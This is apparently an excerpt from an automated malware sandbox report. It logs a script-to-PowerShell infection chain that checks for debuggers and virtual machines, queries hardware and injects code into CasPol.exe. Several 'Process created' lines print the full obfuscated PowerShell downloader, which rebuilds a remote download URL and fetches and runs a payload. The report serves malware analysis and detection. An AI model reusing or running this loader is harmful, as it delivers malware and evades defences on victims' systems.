            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5293Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4081Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5594Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3289Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 7068Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2772Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99438Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99313Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99094Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98422Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98313Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98188Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97844Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97733Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97468Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97359Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97250Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97141Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97031Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96922Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96813Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96688Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96578Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96469Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96344Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96125Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 96015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95906Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95797Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95679Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95563Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95448Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95219Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 95000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 94891Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 94766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 94633Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 94516Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 94406Jump to behavior
            Source: powershell.exe, 00000002.00000002.2150800220.0000019BE9EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1474672095.000001AF7CF58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_2726cGameDVR and Broadcast User Service_2726cBluetooth User Support Service_2726cCaptureService_2726cClipboard User Service_2726cConnected Devices Platform User Service_2726cConsentUX_2726cCredentialEnrollmentManagerUserSvc_2726cDeviceAssociationBroker_2726cDevicePicker_2726cDevicesFlow_2726cMessagingService_2726cSync Host_2726cContact Data_2726cice (A
            Source: wscript.exe, 00000000.00000003.1474898108.000001AF7CF48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_2726cGameDVR and Broadcast User Service_2726cBluetooth User Support Service_2726cCaptureService_2726cClipboard User Service_2726cConnected Devices Platform User Service_2726cConsentUX_2726cCredentialEnrollmentManagerUserSvc_2726cDeviceAssociationBroker_2726cDevicePicker_2726cDevicesFlow_2726cMessagingService_2726cSync Host_2726cContact Data_2726cPrintWorkflow_2726cUdk User Service_2726cUser Data Storage_2726cUser Data Access_2726cWindows Push Notifications User Service_2726c (AppXSVC)O
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_035EAE77 mov eax, dword ptr fs:[00000030h]9_2_035EAE77
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: read writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1190000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EE5008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" " function propje9 ([string]$hjsp){$avancereno=5;for($genne=4; $genne -lt $hjsp.length-1; $genne+=$avancereno){$mdeaftner=$hjsp.substring( $genne, 1);$skotskterr+=$mdeaftner};$skotskterr;}$abonnemen=propje9 'antehensit begtmonopbuckstryn:admi/ for/indudnonurrekiiafstvlcsyesubo.lattgsmitodigeodiscgdatalharpe fug. coccissuoepicmpoly/ intutoweclong?diuretranx typppampointer phitfutu=symfdkasboberawbundnwarll entocommanonsdgtes&juniiomnidgrns=unfr1udvadbenzssamm7fremuskrnxloosospdbidemoivargncuspl fsfqeleclmathueftevcullarufio hal6forskkirigfrer1squa9stifnalimcnumifbagff rhiq refe gge2 resg flaouncamkore0giga ';$skotskterr01=propje9 'prini spyeunquxsurp ';$homem163 = propje9 'atte\makrs apiy ovesprepwagreoauthwkitt6forb4nond\nonbwrushiwaganunded svio sauwdrags cacpdepuoprydwforfelignrgrsgssociherotefisklpastlmemo\knstvdete1famo. bal0 tim\backpdatio pegw seme bikrrheaslobehbanke skalsolal sna.benzegavsxgrapecarn ';. ($skotskterr01) (propje9 'bran$symfrmusiavoldtcigaiparto mooemakur udvafearvpolai gra2supe=inte$lavre gngnsippv gad:coppw afsi gedndyredhegliingerudet ') ; . ($skotskterr01) (propje9 'bort$ fabhoveroideam monegummmrung1 tre6merp3apop=mold$gaelrapopagrantlovriidyloekvieaalersupra beavsupeitamp2cadd+godt$semohburso cysmmulteaktemmess1 for6zine3gobb ') ; . ($skotskterr01) (propje9 'hage$monohredaeferitaeroeantersadeoclampcand rede=bour komm(dame(tolegprsiw flnm scaiprin multw eksiheatnteat3cloi2narr_skylpanatrquarocompcdaniefuglsmordsnonv rei-auktftsem precpdruirfyrsospydccryoepaabsicons gloi idrdouts=mist$tyra{khouptranistildsjak}phal)form. oxicromao klimgesvm nona tronselvdwedll unciwintndybkegulc) nar ker-insesfidup hvil radi quatlaqu unnu[sukkc modhlafgaspoorendu]flyv3klav4deat '); & ($skotskterr01) (propje9 'deaf$ drmsunada colmnatsm fese thanfisc kol=ence tids$monghviatecoevtredeedatar skrocentp sys[cons$digth pine nevtsuppestjerjocaoprimp unc.aliecantio typufirenandetskar- vet2beas]wond '); & ($skotskterr01) (propje9 ' alk$melod mina subtunedaskva= far(overtglycegrensbudgt pre-unpepchimapaattcraihenhe wan$vaerhhaanodestmdiatepetnmnske1fase6trac3mech) enc unop-lavkamarknnoncd ant unpu(kiss[ afpibactnpunktnbetpstilthelprbear]bank:unin: dklspartiempizmuree sun ele-runeeskryq fly rive8 ver)bava ') ;if ($data) {.$homem163 $sammen;} else {;$skotskterr00=propje9 'ruskscarbtstilastaarcoddtakti-pitibskatidalgtrisoscaprttyngroracaelfen vinslawnfklkeekalirmali ang- cats twiorecoufiltrovalcrenmegoos cerv$declaartib speo clensystnhallepancm yace vognunse laes- lard fame betsjavat tmrilkkendagcakinitanveifoliodundnstad repu$ disr sena stataarsiartfostenevincrprecahejev homimeli2have '; .($skotskterr01) (propje9 'sang$tranrmewlaoxydtreceisagsohushe pror jeka colvhvisirapp2afgr=stri$harzedobbnudvivposi:skanalnpappyelpelvrdkammasergtcatdahyri ') ; &
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " function propje9 ([string]$hjsp){$avancereno=5;for($genne=4; $genne -lt $hjsp.length-1; $genne+=$avancereno){$mdeaftner=$hjsp.substring( $genne, 1);$skotskterr+=$mdeaftner};$skotskterr;}$abonnemen=propje9 'antehensit begtmonopbuckstryn:admi/ for/indudnonurrekiiafstvlcsyesubo.lattgsmitodigeodiscgdatalharpe fug. coccissuoepicmpoly/ intutoweclong?diuretranx typppampointer phitfutu=symfdkasboberawbundnwarll entocommanonsdgtes&juniiomnidgrns=unfr1udvadbenzssamm7fremuskrnxloosospdbidemoivargncuspl fsfqeleclmathueftevcullarufio hal6forskkirigfrer1squa9stifnalimcnumifbagff rhiq refe gge2 resg flaouncamkore0giga ';$skotskterr01=propje9 'prini spyeunquxsurp ';$homem163 = propje9 'atte\makrs apiy ovesprepwagreoauthwkitt6forb4nond\nonbwrushiwaganunded svio sauwdrags cacpdepuoprydwforfelignrgrsgssociherotefisklpastlmemo\knstvdete1famo. bal0 tim\backpdatio pegw seme bikrrheaslobehbanke skalsolal sna.benzegavsxgrapecarn ';. ($skotskterr01) (propje9 'bran$symfrmusiavoldtcigaiparto mooemakur udvafearvpolai gra2supe=inte$lavre gngnsippv gad:coppw afsi gedndyredhegliingerudet ') ; . ($skotskterr01) (propje9 'bort$ fabhoveroideam monegummmrung1 tre6merp3apop=mold$gaelrapopagrantlovriidyloekvieaalersupra beavsupeitamp2cadd+godt$semohburso cysmmulteaktemmess1 for6zine3gobb ') ; . ($skotskterr01) (propje9 'hage$monohredaeferitaeroeantersadeoclampcand rede=bour komm(dame(tolegprsiw flnm scaiprin multw eksiheatnteat3cloi2narr_skylpanatrquarocompcdaniefuglsmordsnonv rei-auktftsem precpdruirfyrsospydccryoepaabsicons gloi idrdouts=mist$tyra{khouptranistildsjak}phal)form. oxicromao klimgesvm nona tronselvdwedll unciwintndybkegulc) nar ker-insesfidup hvil radi quatlaqu unnu[sukkc modhlafgaspoorendu]flyv3klav4deat '); & ($skotskterr01) (propje9 'deaf$ drmsunada colmnatsm fese thanfisc kol=ence tids$monghviatecoevtredeedatar skrocentp sys[cons$digth pine nevtsuppestjerjocaoprimp unc.aliecantio typufirenandetskar- vet2beas]wond '); & ($skotskterr01) (propje9 ' alk$melod mina subtunedaskva= far(overtglycegrensbudgt pre-unpepchimapaattcraihenhe wan$vaerhhaanodestmdiatepetnmnske1fase6trac3mech) enc unop-lavkamarknnoncd ant unpu(kiss[ afpibactnpunktnbetpstilthelprbear]bank:unin: dklspartiempizmuree sun ele-runeeskryq fly rive8 ver)bava ') ;if ($data) {.$homem163 $sammen;} else {;$skotskterr00=propje9 'ruskscarbtstilastaarcoddtakti-pitibskatidalgtrisoscaprttyngroracaelfen vinslawnfklkeekalirmali ang- cats twiorecoufiltrovalcrenmegoos cerv$declaartib speo clensystnhallepancm yace vognunse laes- lard fame betsjavat tmrilkkendagcakinitanveifoliodundnstad repu$ disr sena stataarsiartfostenevincrprecahejev homimeli2have '; .($skotskterr01) (propje9 'sang$tranrmewlaoxydtreceisagsohushe pror jeka colvhvisirapp2afgr=stri$harzedobbnudvivposi:skanalnpappyelpelvrdkammasergtcatdahyri ') ; &
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" " function propje9 ([string]$hjsp){$avancereno=5;for($genne=4; $genne -lt $hjsp.length-1; $genne+=$avancereno){$mdeaftner=$hjsp.substring( $genne, 1);$skotskterr+=$mdeaftner};$skotskterr;}$abonnemen=propje9 'antehensit begtmonopbuckstryn:admi/ for/indudnonurrekiiafstvlcsyesubo.lattgsmitodigeodiscgdatalharpe fug. coccissuoepicmpoly/ intutoweclong?diuretranx typppampointer phitfutu=symfdkasboberawbundnwarll entocommanonsdgtes&juniiomnidgrns=unfr1udvadbenzssamm7fremuskrnxloosospdbidemoivargncuspl fsfqeleclmathueftevcullarufio hal6forskkirigfrer1squa9stifnalimcnumifbagff rhiq refe gge2 resg flaouncamkore0giga ';$skotskterr01=propje9 'prini spyeunquxsurp ';$homem163 = propje9 'atte\makrs apiy ovesprepwagreoauthwkitt6forb4nond\nonbwrushiwaganunded svio sauwdrags cacpdepuoprydwforfelignrgrsgssociherotefisklpastlmemo\knstvdete1famo. bal0 tim\backpdatio pegw seme bikrrheaslobehbanke skalsolal sna.benzegavsxgrapecarn ';. ($skotskterr01) (propje9 'bran$symfrmusiavoldtcigaiparto mooemakur udvafearvpolai gra2supe=inte$lavre gngnsippv gad:coppw afsi gedndyredhegliingerudet ') ; . ($skotskterr01) (propje9 'bort$ fabhoveroideam monegummmrung1 tre6merp3apop=mold$gaelrapopagrantlovriidyloekvieaalersupra beavsupeitamp2cadd+godt$semohburso cysmmulteaktemmess1 for6zine3gobb ') ; . ($skotskterr01) (propje9 'hage$monohredaeferitaeroeantersadeoclampcand rede=bour komm(dame(tolegprsiw flnm scaiprin multw eksiheatnteat3cloi2narr_skylpanatrquarocompcdaniefuglsmordsnonv rei-auktftsem precpdruirfyrsospydccryoepaabsicons gloi idrdouts=mist$tyra{khouptranistildsjak}phal)form. oxicromao klimgesvm nona tronselvdwedll unciwintndybkegulc) nar ker-insesfidup hvil radi quatlaqu unnu[sukkc modhlafgaspoorendu]flyv3klav4deat '); & ($skotskterr01) (propje9 'deaf$ drmsunada colmnatsm fese thanfisc kol=ence tids$monghviatecoevtredeedatar skrocentp sys[cons$digth pine nevtsuppestjerjocaoprimp unc.aliecantio typufirenandetskar- vet2beas]wond '); & ($skotskterr01) (propje9 ' alk$melod mina subtunedaskva= far(overtglycegrensbudgt pre-unpepchimapaattcraihenhe wan$vaerhhaanodestmdiatepetnmnske1fase6trac3mech) enc unop-lavkamarknnoncd ant unpu(kiss[ afpibactnpunktnbetpstilthelprbear]bank:unin: dklspartiempizmuree sun ele-runeeskryq fly rive8 ver)bava ') ;if ($data) {.$homem163 $sammen;} else {;$skotskterr00=propje9 'ruskscarbtstilastaarcoddtakti-pitibskatidalgtrisoscaprttyngroracaelfen vinslawnfklkeekalirmali ang- cats twiorecoufiltrovalcrenmegoos cerv$declaartib speo clensystnhallepancm yace vognunse laes- lard fame betsjavat tmrilkkendagcakinitanveifoliodundnstad repu$ disr sena stataarsiartfostenevincrprecahejev homimeli2have '; .($skotskterr01) (propje9 'sang$tranrmewlaoxydtreceisagsohushe pror jeka colvhvisirapp2afgr=stri$harzedobbnudvivposi:skanalnpappyelpelvrdkammasergtcatdahyri ') ; & Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " function propje9 ([string]$hjsp){$avancereno=5;for($genne=4; $genne -lt $hjsp.length-1; $genne+=$avancereno){$mdeaftner=$hjsp.substring( $genne, 1);$skotskterr+=$mdeaftner};$skotskterr;}$abonnemen=propje9 'antehensit begtmonopbuckstryn:admi/ for/indudnonurrekiiafstvlcsyesubo.lattgsmitodigeodiscgdatalharpe fug. coccissuoepicmpoly/ intutoweclong?diuretranx typppampointer phitfutu=symfdkasboberawbundnwarll entocommanonsdgtes&juniiomnidgrns=unfr1udvadbenzssamm7fremuskrnxloosospdbidemoivargncuspl fsfqeleclmathueftevcullarufio hal6forskkirigfrer1squa9stifnalimcnumifbagff rhiq refe gge2 resg flaouncamkore0giga ';$skotskterr01=propje9 'prini spyeunquxsurp ';$homem163 = propje9 'atte\makrs apiy ovesprepwagreoauthwkitt6forb4nond\nonbwrushiwaganunded svio sauwdrags cacpdepuoprydwforfelignrgrsgssociherotefisklpastlmemo\knstvdete1famo. bal0 tim\backpdatio pegw seme bikrrheaslobehbanke skalsolal sna.benzegavsxgrapecarn ';. ($skotskterr01) (propje9 'bran$symfrmusiavoldtcigaiparto mooemakur udvafearvpolai gra2supe=inte$lavre gngnsippv gad:coppw afsi gedndyredhegliingerudet ') ; . ($skotskterr01) (propje9 'bort$ fabhoveroideam monegummmrung1 tre6merp3apop=mold$gaelrapopagrantlovriidyloekvieaalersupra beavsupeitamp2cadd+godt$semohburso cysmmulteaktemmess1 for6zine3gobb ') ; . ($skotskterr01) (propje9 'hage$monohredaeferitaeroeantersadeoclampcand rede=bour komm(dame(tolegprsiw flnm scaiprin multw eksiheatnteat3cloi2narr_skylpanatrquarocompcdaniefuglsmordsnonv rei-auktftsem precpdruirfyrsospydccryoepaabsicons gloi idrdouts=mist$tyra{khouptranistildsjak}phal)form. oxicromao klimgesvm nona tronselvdwedll unciwintndybkegulc) nar ker-insesfidup hvil radi quatlaqu unnu[sukkc modhlafgaspoorendu]flyv3klav4deat '); & ($skotskterr01) (propje9 'deaf$ drmsunada colmnatsm fese thanfisc kol=ence tids$monghviatecoevtredeedatar skrocentp sys[cons$digth pine nevtsuppestjerjocaoprimp unc.aliecantio typufirenandetskar- vet2beas]wond '); & ($skotskterr01) (propje9 ' alk$melod mina subtunedaskva= far(overtglycegrensbudgt pre-unpepchimapaattcraihenhe wan$vaerhhaanodestmdiatepetnmnske1fase6trac3mech) enc unop-lavkamarknnoncd ant unpu(kiss[ afpibactnpunktnbetpstilthelprbear]bank:unin: dklspartiempizmuree sun ele-runeeskryq fly rive8 ver)bava ') ;if ($data) {.$homem163 $sammen;} else {;$skotskterr00=propje9 'ruskscarbtstilastaarcoddtakti-pitibskatidalgtrisoscaprttyngroracaelfen vinslawnfklkeekalirmali ang- cats twiorecoufiltrovalcrenmegoos cerv$declaartib speo clensystnhallepancm yace vognunse laes- lard fame betsjavat tmrilkkendagcakinitanveifoliodundnstad repu$ disr sena stataarsiartfostenevincrprecahejev homimeli2have '; .($skotskterr01) (propje9 'sang$tranrmewlaoxydtreceisagsohushe pror jeka colvhvisirapp2afgr=stri$harzedobbnudvivposi:skanalnpappyelpelvrdkammasergtcatdahyri ') ; & Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava 